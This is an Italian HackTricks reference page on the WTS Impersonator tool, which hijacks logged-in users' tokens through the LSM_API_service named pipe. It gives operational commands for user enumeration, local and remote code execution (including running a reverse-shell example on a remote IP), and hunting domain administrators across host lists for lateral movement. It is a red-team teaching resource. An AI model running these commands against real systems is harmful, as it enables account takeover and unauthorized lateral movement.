WTS Impersonator

Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

Lo strumento WTS Impersonator sfrutta la Named pipe RPC "\pipe\LSM_API_service" per enumerare in modo furtivo gli utenti connessi e dirottare i loro token, eludendo le tecniche tradizionali di impersonificazione dei token. Questo approccio facilita gli spostamenti laterali all'interno delle reti. L'innovazione dietro questa tecnica è attribuita a Omri Baso, il cui lavoro è accessibile su GitHub.

Funzionalità principali

Lo strumento opera attraverso una sequenza di chiamate API:

WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW

Moduli chiave e utilizzo

  • Enumerazione degli utenti: È possibile enumerare gli utenti locali e remoti con lo strumento, utilizzando comandi per entrambi gli scenari:

  • Localmente:

.\WTSImpersonator.exe -m enum
  • In remoto, specificando un indirizzo IP o un nome host:

.\WTSImpersonator.exe -m enum -s 192.168.40.131
  • Esecuzione di comandi: I moduli exec e exec-remote richiedono un contesto di Servizio per funzionare. L'esecuzione locale richiede semplicemente l'eseguibile WTSImpersonator e un comando:

  • Esempio di esecuzione di un comando locale:

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
  • È possibile utilizzare PsExec64.exe per ottenere un contesto di servizio:

.\PsExec64.exe -accepteula -s cmd.exe
  • Esecuzione di comandi remoti: Coinvolge la creazione e l'installazione di un servizio in remoto simile a PsExec.exe, consentendo l'esecuzione con le autorizzazioni appropriate.

  • Esempio di esecuzione remota:

.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
  • Modulo di ricerca utente: Permette di individuare utenti specifici su più macchine, eseguendo codice con le loro credenziali. Questo è particolarmente utile per prendere di mira gli amministratori di dominio con diritti di amministratore locale su diversi sistemi.

  • Esempio di utilizzo:

.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

Last updated